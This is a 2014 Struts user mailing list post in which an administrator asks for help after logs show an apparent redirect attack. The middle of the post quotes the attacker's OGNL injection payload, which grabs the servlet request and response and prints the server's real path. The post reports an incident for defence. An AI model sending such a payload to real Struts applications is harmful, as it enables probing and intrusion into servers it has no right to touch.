struts-user mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From saikrishna <saikrishnaad...@gmail.com>
Subject redirect vulnerability after upgrading to Struts 2.3.16.2
Date Wed, 16 Jul 2014 15:28:17 GMT
Hi Getting the below error.Looks like,somebody tried to attack our application 
with a redirect.Below is the log.Please advice.

ParametersInterceptor:34 - Developer Notification (set struts.devMode to false 
to disable this message):
Unexpected Exception caught setting 
'redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletR
esponse'),#res.setCharacterEncoding("UTF-8"
),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#
res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getSe
r
vletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().clos
e()}' on 'class java.lang.String: 100


somebody trying to post something to the server with the redirect url.

Please suggest what should I do.

Thanks




---------------------------------------------------------------------
To unsubscribe, e-mail: user-unsubscribe@struts.apache.org
For additional commands, e-mail: user-help@struts.apache.org


Mime
View raw message